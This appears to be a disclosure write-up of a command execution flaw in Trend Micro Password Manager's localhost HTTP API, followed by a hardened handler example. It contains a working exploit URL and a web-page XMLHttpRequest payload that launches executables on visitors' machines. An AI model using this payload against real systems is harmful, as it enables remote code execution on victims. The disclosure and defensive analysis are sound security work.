Trend Micro Password Manager arbitrary command execution vulnerability Verification
The Trend Micro anti-virus software package for Windows contains a password management program, which is also offered as a separate download on the official website. It is a free service. Install the latest Trend Micro with the default settings:
Figure 1
You can find this password management program under Data Security, where it is enabled by default. You can see that it listens on a local port:
Figure 2
The listening port here is 49153, while Google's analysis shows 49155, so the port appears to be chosen from a range. The service is an HTTP server written in Node.js. There is an arbitrary command execution vulnerability at this URL:
https://localhost:49153/api/openUrlInDefaultBrowser?url=cmd
This API is used to open a page in a browser:
Figure 3
However, you can also open the system path:
Figure 4
You can then open the file in the path:
Figure 5
In the end, even executable files can be launched this way, which is really powerful:
https://localhost:49153/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe
Figure 6
The danger of this vulnerability is that an attacker only needs to embed a request like this in a web page:
x = new XMLHttpRequest();
x.open("GET", "https://localhost:49153/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe", true);
try { x.send(); } catch (e) {};
When a victim visits that page, the attacker can execute any command on the Windows system where Trend Micro is installed.
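The root cause described above is a localhost API that hands an unvalidated url value to the system launcher and answers requests from any web page. The following is an added example, not Trend Micro's code, of how such a handler could be hardened; the function names, the x-api-token header and the per-install secret are assumptions made for illustration.

```javascript
// Added example, not Trend Micro's code. All names here are hypothetical.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Return a normalized http(s) URL, or null if the value must not be opened.
function validateBrowserUrl(raw) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) return null;
  let parsed;
  try {
    parsed = new URL(raw); // throws on non-absolute input such as "cmd"
  } catch (e) {
    return null;
  }
  // "c:/windows/..." parses with protocol "c:", local files with "file:".
  if (!ALLOWED_SCHEMES.has(parsed.protocol) || !parsed.hostname) return null;
  return parsed.href;
}

// Compare two strings without returning early on the first mismatch.
function constantTimeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Decide what to do with one API request. `headers` uses lower-case keys
// (as Node's http module provides); `secret` is a per-install random token
// known only to the local client (an assumption of this sketch).
function handleOpenUrl(query, headers, secret) {
  // Browsers attach Origin to cross-origin XHR/fetch; the local client does not.
  // Origin alone is not enough (image or navigation GETs omit it), hence the token.
  if (headers["origin"] !== undefined) return { status: 403, open: null };
  if (!constantTimeEqual(headers["x-api-token"], secret)) return { status: 401, open: null };
  const url = validateBrowserUrl(query.url);
  if (url === null) return { status: 400, open: null };
  return { status: 200, open: url }; // caller passes `open` to the browser launcher
}
```

With these checks, the cross-origin request shown above is rejected before the url parameter is examined, and even an authenticated caller cannot pass a file path or bare command name.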